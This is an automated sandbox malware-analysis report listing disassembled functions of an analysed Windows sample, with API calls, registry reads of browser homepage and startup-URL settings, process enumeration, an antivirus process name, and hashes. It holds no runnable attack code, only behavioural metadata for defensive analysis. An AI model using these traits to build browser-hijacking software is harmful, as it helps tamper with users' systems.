                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                          • String ID: Valu$VerQ$dll$foSi$ion.$uery$vers
                                                                                                                                                                                                          • API String ID: 2238633743-3386711270
                                                                                                                                                                                                          • Opcode ID: 4979028e2a5a69b3c06800cdf58786957db35159d2fd76c2291e31f453e3b0ee
                                                                                                                                                                                                          • Instruction ID: 74823da3dc24b8292d3ced95fd42fbba1b00a736b9c2f89e65147783e8b47aa0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4979028e2a5a69b3c06800cdf58786957db35159d2fd76c2291e31f453e3b0ee
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E3129B1D0064AEBDB00CF99D9447DEFBF8FF58304F10821AE428A7650EB74A654CB95
                                                                                                                                                                                                          Function 004041F0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 263registrytimeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00483970: GetProcAddress.KERNEL32 ref: 004839FF
                                                                                                                                                                                                            • Part of subcall function 00483970: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00483A15
                                                                                                                                                                                                            • Part of subcall function 00483970: Process32FirstW.KERNEL32(00000000,?), ref: 00483A24
                                                                                                                                                                                                            • Part of subcall function 00483970: Process32NextW.KERNEL32(00000000,?), ref: 00483A4C
                                                                                                                                                                                                            • Part of subcall function 00483970: CloseHandle.KERNEL32(00000000), ref: 00483A53
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,EFE0703F), ref: 00404337
                                                                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00404357
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 00404361
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,THUIDBEGKGSADW,00000000,86CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040437E
                                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 004043A3
                                                                                                                                                                                                            • Part of subcall function 00483970: CloseHandle.KERNEL32(00000000), ref: 00483A7B
                                                                                                                                                                                                          • SetTimer.USER32(?,00002F59,00001770,00000000), ref: 00404467
                                                                                                                                                                                                            • Part of subcall function 004045E0: RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020019,00000000,EFE0703F,?,?), ref: 004046D6
                                                                                                                                                                                                            • Part of subcall function 004045E0: RegQueryValueExW.ADVAPI32(00000000,0061006C,00000000,00000000,?,0000020A,?,?,?), ref: 00404776
                                                                                                                                                                                                            • Part of subcall function 004045E0: RegCloseKey.ADVAPI32(00000000,?,?,?), ref: 00404782
                                                                                                                                                                                                            • Part of subcall function 004050C0: RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020019,?,EFE0703F,?), ref: 0040538D
                                                                                                                                                                                                            • Part of subcall function 004050C0: RegQueryValueExW.ADVAPI32(00000000,0061006C,00000000,00000000,?,0000020A), ref: 00405433
                                                                                                                                                                                                            • Part of subcall function 004050C0: RegCloseKey.ADVAPI32(00000000), ref: 0040543F
                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,?,home), ref: 0040452F
                                                                                                                                                                                                          • SetEvent.KERNEL32(00000000), ref: 00404536
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseHandle$Create$EventModuleOpenProcess32QueryValueWindow$AddressClassFirstLongNextProcRegisterSnapshotTimerToolhelp32
                                                                                                                                                                                                          • String ID: THUIDBEGKGSADW$home
                                                                                                                                                                                                          • API String ID: 3099295237-1807252216
                                                                                                                                                                                                          • Opcode ID: 5d34372b7bd3ee3651931b0817b8e93c7a9ae7619bbc4397521099f72e0b056b
                                                                                                                                                                                                          • Instruction ID: de3f61e570d049e69affd51998ca8969852e6dcd6c4531ab67e07bd7b4b86903
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d34372b7bd3ee3651931b0817b8e93c7a9ae7619bbc4397521099f72e0b056b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDA1D5B0A102089BEB14EFA4CC49B9EBF75FF81308F104269E505BB2D1DBB95A84CB55
                                                                                                                                                                                                          Function 0046F28E Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 219threadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0046F2A1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentThread
                                                                                                                                                                                                          • String ID: ({Y$dtrR
                                                                                                                                                                                                          • API String ID: 2882836952-3251534292
                                                                                                                                                                                                          • Opcode ID: b9d3db8f0998f64f23b0f49ef3fb0bbfc950efb19b83652c75b400f21217ff7c
                                                                                                                                                                                                          • Instruction ID: 2c0bf983d58812fb3ef5785e21656bdbf6918a1aa19d560037ee40d037b65249
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9d3db8f0998f64f23b0f49ef3fb0bbfc950efb19b83652c75b400f21217ff7c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F810275100605DFCB20CF24E884A66B7B2FF69314B20417BD89587751EB38EC8ADF96
                                                                                                                                                                                                          Function 00437ED0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 106libraryloaderregistryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlInitializeCriticalSection.NTDLL(00597C64), ref: 00415E2E
                                                                                                                                                                                                            • Part of subcall function 00415DC0: __Init_thread_footer.LIBCMT ref: 00415E4A
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlEnterCriticalSection.NTDLL(00597C64), ref: 00415E65
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlLeaveCriticalSection.NTDLL(00597C64), ref: 00415EBB
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00437F24
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00437F7E
                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,InstallDate,00000000,?,?,00000100,?,00000000), ref: 00437F99
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00437FCB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressCriticalProcSection$EnterInit_thread_footerInitializeLeaveQueryValue
                                                                                                                                                                                                          • String ID: InstallDate$Key$RegC$RegO$SOFTWARE\Microsoft\Windows NT\CurrentVersion$lose
                                                                                                                                                                                                          • API String ID: 1722220145-3360175959
                                                                                                                                                                                                          • Opcode ID: eeb8f4af582e9e18a070b9b1cf8443e48bd264543de679c0b597f88aede0d498
                                                                                                                                                                                                          • Instruction ID: f51dd1c5e7569d7ee64366b7a600911872349635878d4a96c5e6906628fae09d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eeb8f4af582e9e18a070b9b1cf8443e48bd264543de679c0b597f88aede0d498
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49413EB1A002099FDB10DFA9D981AEFBBF8FF48300F10556EE545F3241DB74AA448BA4
                                                                                                                                                                                                          Function 004050C0 Relevance: 16.5, APIs: 7, Strings: 2, Instructions: 717registrylibraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020019,?,EFE0703F,?), ref: 0040538D
                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,0061006C,00000000,00000000,?,0000020A), ref: 00405433
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040543F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00405607
                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020019,?,EFE0703F), ref: 00405AB4
                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00740053,00000000,00000001,?,00000104), ref: 00405B35
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00405B41
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseOpenQueryValue$AddressProc
                                                                                                                                                                                                          • String ID: home$page
                                                                                                                                                                                                          • API String ID: 3111369219-3140408881
                                                                                                                                                                                                          • Opcode ID: 7b79eba9263786893866ec1fa9af5feaea01591360d849ea7da4990455b0358d
                                                                                                                                                                                                          • Instruction ID: 38e7d1d0abe333740f891d0304dc5927cb132ff78b16d22ca422c218e70641b8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b79eba9263786893866ec1fa9af5feaea01591360d849ea7da4990455b0358d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F627DB0901618DBEB24DF54CD48BDEBBB5FF44308F1042ADD509A7291DBB96A88CF94
                                                                                                                                                                                                          Function 00405C80 Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 362libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00405D0F
                                                                                                                                                                                                            • Part of subcall function 004717A0: std::locale::facet::facet.LIBCPMTD ref: 00471814
                                                                                                                                                                                                            • Part of subcall function 004717A0: Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00471844
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00405D8C
                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(?,?,?,?,?,?,?), ref: 00405D9B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressProc$Affinity::operator!=Concurrency::details::EnterExistsFileHardwareInit_thread_footerInitializeLeavePathstd::locale::facet::facet
                                                                                                                                                                                                          • String ID: ces$ion$sess$star$tup_$urls
                                                                                                                                                                                                          • API String ID: 2857489092-3847234075
                                                                                                                                                                                                          • Opcode ID: 144d4fe3b548dfb2d315c02852a20befee574216dbad169d1b1e79d1547f0957
                                                                                                                                                                                                          • Instruction ID: c03e4c8e7f3104c698af547b441a8db5b5e61d86c528da2eac5f0a599ab7c7c2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 144d4fe3b548dfb2d315c02852a20befee574216dbad169d1b1e79d1547f0957
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80E19171D002589BDB25DB64CD457DEB7B8AF55304F1082EEE409B7292EB386B88CF94
                                                                                                                                                                                                          Function 00407510 Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 359libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040759F
                                                                                                                                                                                                            • Part of subcall function 004717A0: std::locale::facet::facet.LIBCPMTD ref: 00471814
                                                                                                                                                                                                            • Part of subcall function 004717A0: Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00471844
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00407620
                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(?,?,?,?,?,?,?), ref: 0040762F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressProc$Affinity::operator!=Concurrency::details::EnterExistsFileHardwareInit_thread_footerInitializeLeavePathstd::locale::facet::facet
                                                                                                                                                                                                          • String ID: ion$nces$sess$star$tup_$urls
                                                                                                                                                                                                          • API String ID: 2857489092-3048481300
                                                                                                                                                                                                          • Opcode ID: d5136dc851da2c277e804589074bbde125e70991f62ccf397ad0d931ae745db1
                                                                                                                                                                                                          • Instruction ID: 52ea1bf94da476a521094806a63c5578b8c33458e04c5f20b5cbe593ff7f6378
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5136dc851da2c277e804589074bbde125e70991f62ccf397ad0d931ae745db1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09E1E271D042589BEB21DB64CD45BDEB7B8AF15304F0081EAE408B7291EB386BC8CF95
                                                                                                                                                                                                          Function 00407AB0 Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 353libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00407B3F
                                                                                                                                                                                                            • Part of subcall function 004717A0: std::locale::facet::facet.LIBCPMTD ref: 00471814
                                                                                                                                                                                                            • Part of subcall function 004717A0: Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00471844
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00407BC6
                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(?), ref: 00407BD5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressProc$Affinity::operator!=Concurrency::details::EnterExistsFileHardwareInit_thread_footerInitializeLeavePathstd::locale::facet::facet
                                                                                                                                                                                                          • String ID: ion$renc$sess$star$tup_$urls
                                                                                                                                                                                                          • API String ID: 2857489092-1472271390
                                                                                                                                                                                                          • Opcode ID: d517398d135e40a8c35e5436d6a442766f4d21db3bf6c25803f1051526472af4
                                                                                                                                                                                                          • Instruction ID: 4f18e852039a81dd0aca6fceb0e2757b3ddb86dfec1834c94160d8a079b48f0e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d517398d135e40a8c35e5436d6a442766f4d21db3bf6c25803f1051526472af4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6E1C271C012589BDB21DB64CD45BEEB7B8AF15304F0081EAE408B7291EB786B88CF95
                                                                                                                                                                                                          Function 004231E0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 217libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,005733F8,00000000), ref: 00423228
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlInitializeCriticalSection.NTDLL(00597C18), ref: 00413AAE
                                                                                                                                                                                                            • Part of subcall function 00413A40: __Init_thread_footer.LIBCMT ref: 00413ACA
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlEnterCriticalSection.NTDLL(00597C18), ref: 00413AE5
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlLeaveCriticalSection.NTDLL(00597C18), ref: 00413B41
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00423258
                                                                                                                                                                                                          • _strrchr.LIBCMT ref: 00423282
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,@1_360.exe), ref: 004232FF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0042332F
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,@1_360.exe), ref: 004233FC
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressHandleModuleProc$EnterErrorInit_thread_footerInitializeLastLeave_strrchr
                                                                                                                                                                                                          • String ID: @1_360.exe$eA$v0001360.exe
                                                                                                                                                                                                          • API String ID: 2216385903-2796156030
                                                                                                                                                                                                          • Opcode ID: bcc402a24a81acf323bd091558bf85ea3eed10d5f581eef234b029f8eec36962
                                                                                                                                                                                                          • Instruction ID: 4808f37d2c3689c0db1d776ec11129cb46ed44d0e7024bd2e76846e01928d9ba
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcc402a24a81acf323bd091558bf85ea3eed10d5f581eef234b029f8eec36962
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79814671A002099BEB14EF64DC45BEFBBB5FF45305F14425EE405A7281EB78AB48CBA4
                                                                                                                                                                                                          Function 004045E0 Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 464registrylibraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020019,00000000,EFE0703F,?,?), ref: 004046D6
                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,0061006C,00000000,00000000,?,0000020A,?,?,?), ref: 00404776
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?), ref: 00404782
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00404921
                                                                                                                                                                                                            • Part of subcall function 004717A0: std::locale::facet::facet.LIBCPMTD ref: 00471814
                                                                                                                                                                                                            • Part of subcall function 004717A0: Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00471844
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressAffinity::operator!=CloseConcurrency::details::HardwareOpenProcQueryValuestd::locale::facet::facet
                                                                                                                                                                                                          • String ID: ion$on_s$sess$tart
                                                                                                                                                                                                          • API String ID: 1128421385-1165013425
                                                                                                                                                                                                          • Opcode ID: 849f31abba986c8d13efc73d28ff38aa34d7b5ae23e4ba826919106a7963f06e
                                                                                                                                                                                                          • Instruction ID: 27f32b18423dbf5d08f02fbabdd1180e3e5dbf8682b9e4d71c4c8e62e6362810
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 849f31abba986c8d13efc73d28ff38aa34d7b5ae23e4ba826919106a7963f06e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0229BB09012589BDB25DF64CD54BDEBBB9AF44308F1081EDE508B7291DB785B88CF98
                                                                                                                                                                                                          Function 0046B140 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 215comlibraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(005980A4), ref: 0046B1B1
